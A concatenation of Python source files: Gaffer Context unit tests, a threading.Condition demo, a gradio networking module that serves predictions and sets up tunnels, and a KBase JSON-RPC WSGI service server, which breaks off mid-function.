def testSetOnSharedContextsReleasesReference( self ) :
c1 = Gaffer.Context()
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1.get( "testIntVector", _copy=False ).refCount(), r )
def testHash( self ) :
c = Gaffer.Context()
hashes = [ c.hash() ]
c["test"] = 1
hashes.append( c.hash() )
c["test"] = 2
hashes.append( c.hash() )
c["test2"] = "test2"
hashes.append( c.hash() )
self.assertEqual( len( hashes ), 4 )
self.assertEqual( len( set( str( h ) for h in hashes ) ), len( hashes ) )
c["test2"] = "test2" # no change
self.assertEqual( c.hash(), hashes[-1] )
def testChanged( self ) :
c = Gaffer.Context()
c["test"] = IECore.StringVectorData( [ "one" ] )
h = c.hash()
cs = GafferTest.CapturingSlot( c.changedSignal() )
d = c.get( "test", _copy = False ) # dangerous! the context won't know if we make changes
d.append( "two" )
self.assertEqual( c.get( "test" ), IECore.StringVectorData( [ "one", "two" ] ) )
self.assertEqual( len( cs ), 0 )
c.changed( "test" ) # let the context know what we've been up to
self.assertEqual( len( cs ), 1 )
self.assertEqual( cs[0], ( c, "test" ) )
self.assertNotEqual( c.hash(), h )
def testHashIgnoresUIEntries( self ) :
c = Gaffer.Context()
h = c.hash()
c["ui:test"] = 1
self.assertEqual( h, c.hash() )
del c["ui:test"]
self.assertEqual( c.names(), Gaffer.Context().names() )
self.assertEqual( h, c.hash() )
c["ui:test"] = 1
c["ui:test2"] = "foo"
self.assertEqual( h, c.hash() )
c.removeMatching( "ui:test*" )
self.assertEqual( c.names(), Gaffer.Context().names() )
self.assertEqual( h, c.hash() )
@GafferTest.TestRunner.PerformanceTestMethod()
def testManySubstitutions( self ) :
GafferTest.testManySubstitutions()
@GafferTest.TestRunner.PerformanceTestMethod()
def testManyEnvironmentSubstitutions( self ) :
GafferTest.testManyEnvironmentSubstitutions()
def testEscapedSubstitutions( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( r"\${a}.\$b" ), "${a}.$b" )
self.assertEqual( c.substitute( r"\~" ), "~" )
self.assertEqual( c.substitute( r"\#\#\#\#" ), "####" )
# really we're passing \\ to substitute and getting back \ -
# the extra slashes are escaping for the python interpreter.
self.assertEqual( c.substitute( "\\\\" ), "\\" )
self.assertEqual( c.substitute( "\\" ), "" )
def testRemove( self ) :
c = Gaffer.Context()
c["a"] = "apple"
c["b"] = "bear"
c["c"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a", "b", "c", "frame", "framesPerSecond" ] ) )
# test Context.remove()
c.remove( "a" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "c", "frame", "framesPerSecond" ] ) )
h = c.hash()
# test Context.__delitem__()
del c[ "c" ]
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "frame", "framesPerSecond" ] ) )
self.assertEqual( c["b"], "bear" )
def testRemoveMatching( self ) :
c = Gaffer.Context()
c["a_1"] = "apple"
c["a_2"] = "apple"
c["b_1"] = "bear"
c["b_2"] = "bear"
c["c_1"] = "cat"
c["c_2"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a_1", "a_2", "b_1", "b_2", "c_1", "c_2", "frame", "framesPerSecond" ] ) )
# test Context.removeMatching()
c.removeMatching( "a* c*" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b_1", "b_2", "frame", "framesPerSecond" ] ) )
h = c.hash()
def testContains( self ) :
c = Gaffer.Context()
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
c["a"] = 1
self.assertTrue( "a" in c )
self.assertFalse( "a" not in c )
del c["a"]
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
def testTime( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 1.0 / 24.0 )
c.setFrame( 12.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 24.0 )
c.setFramesPerSecond( 48.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 48.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 48.0 )
def testEditableScope( self ) :
GafferTest.testEditableScope()
def testCanceller( self ) :
c = Gaffer.Context()
c["test"] = 1
self.assertEqual( c.canceller(), None )
canceller = IECore.Canceller()
cc = Gaffer.Context( c, canceller )
self.assertEqual( cc["test"], 1 )
self.assertTrue( cc.canceller() is not None )
canceller.cancel()
with self.assertRaises( IECore.Cancelled ) :
IECore.Canceller.check( cc.canceller() )
contextCopy = Gaffer.Context( cc )
self.assertTrue( contextCopy.canceller() is not None )
with self.assertRaises( IECore.Cancelled ) :
IECore.Canceller.check( cc.canceller() )
def testCancellerLifetime( self ) :
canceller = IECore.Canceller()
context = Gaffer.Context( Gaffer.Context(), canceller )
cancellerWeakRef = weakref.ref( canceller )
del canceller
self.assertIsNotNone( cancellerWeakRef() )
del context
self.assertIsNone( cancellerWeakRef() )
def testOmitCanceller( self ) :
context1 = Gaffer.Context( Gaffer.Context(), IECore.Canceller() )
self.assertIsNotNone( context1.canceller() )
context2 = Gaffer.Context( context1, omitCanceller = True )
self.assertIsNone( context2.canceller() )
context3 = Gaffer.Context( context1, omitCanceller = False )
self.assertIsNotNone( context3.canceller() )
@staticmethod
def collisionCountParallelHelper( seed, mode, countList ):
r = GafferTest.countContextHash32Collisions( 2**20, mode, seed )
for i in range(4):
countList[i] = r[i]
# TODO - add new test flag `gaffer test -type all|standard|performance|verySlow`, where "verySlow"
# would enable tests like this
@unittest.skipIf( True, "Too expensive to run currently" )
def testContextHashCollisions( self ) :
iters = 10
# Test all 4 context creation modes ( see ContextTest.cpp for descriptions )
for mode in [0,1,2,3]:
# This would be much cleaner once we can use concurrent.futures
import threading
results = [ [0,0,0,0] for i in range( iters ) ]
threads = []
for i in range( iters ):
x = threading.Thread( target=self.collisionCountParallelHelper, args=( i, mode, results[i] ) )
x.start()
threads.append( x )
for x in threads:
x.join()
s = [0,0,0,0]
for l in results:
for i in range(4):
s[i] += l[i]
# countContextHash32Collisions returns the number of collisions in each of four 32 bit chunks
# of the hash independently - as long as the uniformity of each chunk is good, the chance
# of a full collision of all four chunks is extremely small.
#
# We test it with 2**20 entries. We can approximate the number of expected 32 bit
# collisions as a binomial distribution - the probability changes as entries are inserted, but
# the average probability of a collision per item is when half the entries have been processed,
# for a probability of `0.5 * 2**20 / 2**32 = 0.00012207`. Using this probability, and N=2**20,
# in a binomial distribution, yields a mean outcome of 128.0 collisions.
# From: https://en.wikipedia.org/wiki/Birthday_problem, section "Collision Counting", the true
# result is `2**20 - 2**32 + 2**32 * ( (2**32 - 1)/2**32 )**(2**20) = 127.989` .. close enough
# to suggest our approximation works. Based on our approximated binomial distribution then,
# taking the number of iterations up to 10 * 2**20 for our sum over 10 trials, the sum should
# have a mean of 1280, and be in the range [1170 .. 1390] 99.8% of the time.
#
# This means there is some chance of this test failing ( especially because this math is
# approximate ), but it is too slow to run on CI anyway, and this test should provide some
# assurance that our MurmurHash is performing extremely similarly to a theoretical ideal
# uniformly distributed hash, even after a trick like summing the entry hashes.
#
# Because the bits of the hash are all evenly mixed, the rate of collisions should be identical
# regardless of which 32bit chunk we test.
#
# One note for my future self: there is a curious pattern you will see if you
# print s: if using 64bit sums of individual hashes, then the low 32 bit chunks
# ( chunks 0 and 3 ) will always produce the same number of collisions in mode 0 and 1.
# This is because most of the entries in mode 1 do not change, and the only source of variation
# is the one entry which matches mode 0 ... but this is expected, and crucially, while the
# number of collisions within mode 0 and mode 1 comes out identical, this does not increase the
# chances of a collision between contexts with one varying entry, and context with one varying
# entry plus fixed entries ( mode 3 demonstrates this ).
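# For reference, the numbers quoted above can be reproduced directly (illustrative
# arithmetic only, not executed by the test) :
#
#   p = 0.5 * 2**20 / 2**32                                                # ~0.00012207
#   mean = p * 2**20                                                       # = 128.0 collisions per trial
#   exact = 2**20 - 2**32 + 2**32 * ( ( 2**32 - 1 ) / 2**32 )**( 2**20 )   # ~127.989
#   meanOfSum = 10 * mean                                                  # = 1280 for the 10 summed trials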
for i in range(4):
self.assertLess( s[i], 1390.0 )
self.assertGreater( s[i], 1170.0 )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextHashPerformance( self ) :
GafferTest.testContextHashPerformance( 10, 10, False )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextHashPerformanceStartInitialized( self ) :
GafferTest.testContextHashPerformance( 10, 10, True )
if __name__ == "__main__":
unittest.main()
|
condition.py
|
import time
import threading
def consumer(cond):
t = threading.current_thread()
with cond:
cond.wait()
print('{}: Resource is available to consumer'.format(t.name))
def producer(cond):
t = threading.current_thread()
with cond:
print('{}: Making resource available'.format(t.name))
cond.notify_all()
condition = threading.Condition()
c1 = threading.Thread(name='c1', target=consumer, args=(condition,))
c2 = threading.Thread(name='c2', target=consumer, args=(condition,))
p = threading.Thread(name='p', target=producer, args=(condition,))
c1.start()
time.sleep(1)
c2.start()
time.sleep(1)
p.start()
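# Not part of the original snippet: explicitly joining the demo threads before exit
# is optional (they are non-daemon), but makes the shutdown order explicit.
for t in (c1, c2, p): t.join()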
|
networking.py
|
"""
Defines helper methods useful for setting up ports, launching servers, and handling `ngrok`
"""
import os
import socket
import threading
from http.server import HTTPServer as BaseHTTPServer, SimpleHTTPRequestHandler
import pkg_resources
from distutils import dir_util
from gradio import inputs, outputs
import json
from gradio.tunneling import create_tunnel
import urllib.request
from shutil import copyfile
import requests
import sys
import analytics
INITIAL_PORT_VALUE = (
7860
) # The http server will try to open on port 7860. If not available, 7861, 7862, etc.
TRY_NUM_PORTS = (
100
) # Number of ports to try before giving up and throwing an exception.
LOCALHOST_NAME = os.getenv('GRADIO_SERVER_NAME', "127.0.0.1")
GRADIO_API_SERVER = "https://api.gradio.app/v1/tunnel-request"
STATIC_TEMPLATE_LIB = pkg_resources.resource_filename("gradio", "templates/")
STATIC_PATH_LIB = pkg_resources.resource_filename("gradio", "static/")
STATIC_PATH_TEMP = "static/"
TEMPLATE_TEMP = "index.html"
BASE_JS_FILE = "static/js/all_io.js"
CONFIG_FILE = "static/config.json"
ASSOCIATION_PATH_IN_STATIC = "static/apple-app-site-association"
ASSOCIATION_PATH_IN_ROOT = "apple-app-site-association"
FLAGGING_DIRECTORY = 'static/flagged/'
FLAGGING_FILENAME = 'data.txt'
analytics.write_key = "uxIFddIEuuUcFLf9VgH2teTEtPlWdkNy"
analytics_url = 'https://api.gradio.app/'
def build_template(temp_dir):
"""
Create HTML file with supporting JS and CSS files in a given directory.
:param temp_dir: string with path to temp directory in which the html file should be built
"""
dir_util.copy_tree(STATIC_TEMPLATE_LIB, temp_dir)
dir_util.copy_tree(STATIC_PATH_LIB, os.path.join(
temp_dir, STATIC_PATH_TEMP))
# Move association file to root of temporary directory.
copyfile(os.path.join(temp_dir, ASSOCIATION_PATH_IN_STATIC),
os.path.join(temp_dir, ASSOCIATION_PATH_IN_ROOT))
def render_template_with_tags(template_path, context):
"""
Combines the given template with a given context dictionary by replacing all of the occurrences of tags (enclosed
in double curly braces) with corresponding values.
:param template_path: a string with the path to the template file
:param context: a dictionary whose string keys are the tags to replace and whose string values are the replacements.
"""
print(template_path, context)
with open(template_path) as fin:
old_lines = fin.readlines()
new_lines = render_string_or_list_with_tags(old_lines, context)
with open(template_path, "w") as fout:
for line in new_lines:
fout.write(line)
def render_string_or_list_with_tags(old_lines, context):
# Handle string case
if isinstance(old_lines, str):
for key, value in context.items():
old_lines = old_lines.replace(r"{{" + key + r"}}", str(value))
return old_lines
# Handle list case
new_lines = []
for line in old_lines:
for key, value in context.items():
line = line.replace(r"{{" + key + r"}}", str(value))
new_lines.append(line)
return new_lines
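# A quick illustration of the tag replacement above (hypothetical values):
#
#   render_string_or_list_with_tags("Hello {{name}}!", {"name": "world"})
#   # -> "Hello world!"
#   render_string_or_list_with_tags(["{{a}}\n", "{{b}}\n"], {"a": 1, "b": 2})
#   # -> ["1\n", "2\n"]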
def set_config(config, temp_dir):
config_file = os.path.join(temp_dir, CONFIG_FILE)
with open(config_file, "w") as output:
json.dump(config, output)
def get_first_available_port(initial, final):
"""
Gets the first open port in a specified range of port numbers
:param initial: the initial value in the range of port numbers
:param final: final (exclusive) value in the range of port numbers, should be greater than `initial`
:return: the first port in the range that could be bound
"""
for port in range(initial, final):
try:
s = socket.socket() # create a socket object
s.bind((LOCALHOST_NAME, port)) # Bind to the port
s.close()
return port
except OSError:
pass
raise OSError(
"All ports from {} to {} are in use. Please close a port.".format(
initial, final
)
)
def send_prediction_analytics(interface):
data = {'title': interface.title,
'description': interface.description,
'thumbnail': interface.thumbnail,
'input_interface': interface.input_interfaces,
'output_interface': interface.output_interfaces,
}
print(data)
try:
requests.post(
analytics_url + 'gradio-prediction-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
def serve_files_in_background(interface, port, directory_to_serve=None, server_name=LOCALHOST_NAME):
class HTTPHandler(SimpleHTTPRequestHandler):
"""This handler uses server.base_path instead of always using os.getcwd()"""
def _set_headers(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
def translate_path(self, path):
path = SimpleHTTPRequestHandler.translate_path(self, path)
relpath = os.path.relpath(path, os.getcwd())
fullpath = os.path.join(self.server.base_path, relpath)
return fullpath
def log_message(self, format, *args):
return
def do_POST(self):
# Read body of the request.
if self.path == "/api/predict/":
# Make the prediction.
self._set_headers()
data_string = self.rfile.read(
int(self.headers["Content-Length"]))
msg = json.loads(data_string)
raw_input = msg["data"]
prediction, durations = interface.process(raw_input)
output = {"data": prediction, "durations": durations}
if interface.saliency is not None:
saliency = interface.saliency(raw_input, prediction)
output['saliency'] = saliency.tolist()
# if interface.always_flag:
# msg = json.loads(data_string)
# flag_dir = os.path.join(FLAGGING_DIRECTORY, str(interface.hash))
# os.makedirs(flag_dir, exist_ok=True)
# output_flag = {'input': interface.input_interface.rebuild_flagged(flag_dir, msg['data']),
# 'output': interface.output_interface.rebuild_flagged(flag_dir, processed_output),
# }
# with open(os.path.join(flag_dir, FLAGGING_FILENAME), 'a+') as f:
# f.write(json.dumps(output_flag))
# f.write("\n")
self.wfile.write(json.dumps(output).encode())
analytics_thread = threading.Thread(
target=send_prediction_analytics, args=[interface])
analytics_thread.start()
elif self.path == "/api/flag/":
self._set_headers()
data_string = self.rfile.read(
int(self.headers["Content-Length"]))
msg = json.loads(data_string)
flag_dir = os.path.join(FLAGGING_DIRECTORY,
str(interface.flag_hash))
os.makedirs(flag_dir, exist_ok=True)
output = {'inputs': [interface.input_interfaces[
i].rebuild_flagged(
flag_dir, msg['data']['input_data']) for i
in range(len(interface.input_interfaces))],
'outputs': [interface.output_interfaces[
i].rebuild_flagged(
flag_dir, msg['data']['output_data']) for i
in range(len(interface.output_interfaces))],
'message': msg['data']['message']}
with open(os.path.join(flag_dir, FLAGGING_FILENAME), 'a+') as f:
f.write(json.dumps(output))
f.write("\n")
else:
self.send_error(404, 'Path not found: {}'.format(self.path))
class HTTPServer(BaseHTTPServer):
"""The main server, you pass in base_path which is the path you want to serve requests from"""
def __init__(self, base_path, server_address, RequestHandlerClass=HTTPHandler):
self.base_path = base_path
BaseHTTPServer.__init__(self, server_address, RequestHandlerClass)
httpd = HTTPServer(directory_to_serve, (server_name, port))
# Now loop forever
def serve_forever():
try:
while True:
sys.stdout.flush()
httpd.serve_forever()
except (KeyboardInterrupt, OSError):
httpd.shutdown()
httpd.server_close()
thread = threading.Thread(target=serve_forever, daemon=False)
thread.start()
return httpd
def start_simple_server(interface, directory_to_serve=None, server_name=None):
port = get_first_available_port(
INITIAL_PORT_VALUE, INITIAL_PORT_VALUE + TRY_NUM_PORTS
)
httpd = serve_files_in_background(interface, port, directory_to_serve, server_name)
return port, httpd
def close_server(server):
server.server_close()
def url_request(url):
try:
req = urllib.request.Request(
url=url, headers={"content-type": "application/json"}
)
res = urllib.request.urlopen(req, timeout=10)
return res
except Exception as e:
raise RuntimeError(str(e))
def setup_tunnel(local_server_port):
response = url_request(GRADIO_API_SERVER)
if response and response.code == 200:
try:
payload = json.loads(response.read().decode("utf-8"))[0]
return create_tunnel(payload, LOCALHOST_NAME, local_server_port)
except Exception as e:
raise RuntimeError(str(e))
def url_ok(url):
try:
r = requests.head(url)
return r.status_code == 200
except requests.ConnectionError:
return False
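# Typical flow for the helpers above (illustrative sketch only; `interface` is assumed
# to be a gradio Interface-like object providing process(), title, etc.):
#
#   port, httpd = start_simple_server(interface, directory_to_serve="build/", server_name=LOCALHOST_NAME)
#   if url_ok("http://{}:{}/".format(LOCALHOST_NAME, port)):
#       share_url = setup_tunnel(port)   # optional public URL via the gradio tunnel API
#   ...
#   close_server(httpd)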
|
GenericsServiceServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from GenericsService.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'GenericsService'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from GenericsService.GenericsServiceImpl import GenericsService # noqa @IgnorePep8
impl_GenericsService = GenericsService(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'GenericsService'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_GenericsService.fetch_data,
name='GenericsService.fetch_data',
types=[dict])
self.method_authentication['GenericsService.fetch_data'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.count_attribute_value,
name='GenericsService.count_attribute_value',
types=[dict])
self.method_authentication['GenericsService.count_attribute_value'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.select_col_ids,
name='GenericsService.select_col_ids',
types=[dict])
self.method_authentication['GenericsService.select_col_ids'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.select_row_ids,
name='GenericsService.select_row_ids',
types=[dict])
self.method_authentication['GenericsService.select_row_ids'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.fetch_attributes,
name='GenericsService.fetch_attributes',
types=[dict])
self.method_authentication['GenericsService.fetch_attributes'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.fetch_data_by_ids,
name='GenericsService.fetch_data_by_ids',
types=[dict])
self.method_authentication['GenericsService.fetch_data_by_ids'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.fetch_all,
name='GenericsService.fetch_all',
types=[dict])
self.method_authentication['GenericsService.fetch_all'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.status,
name='GenericsService.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'GenericsService ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
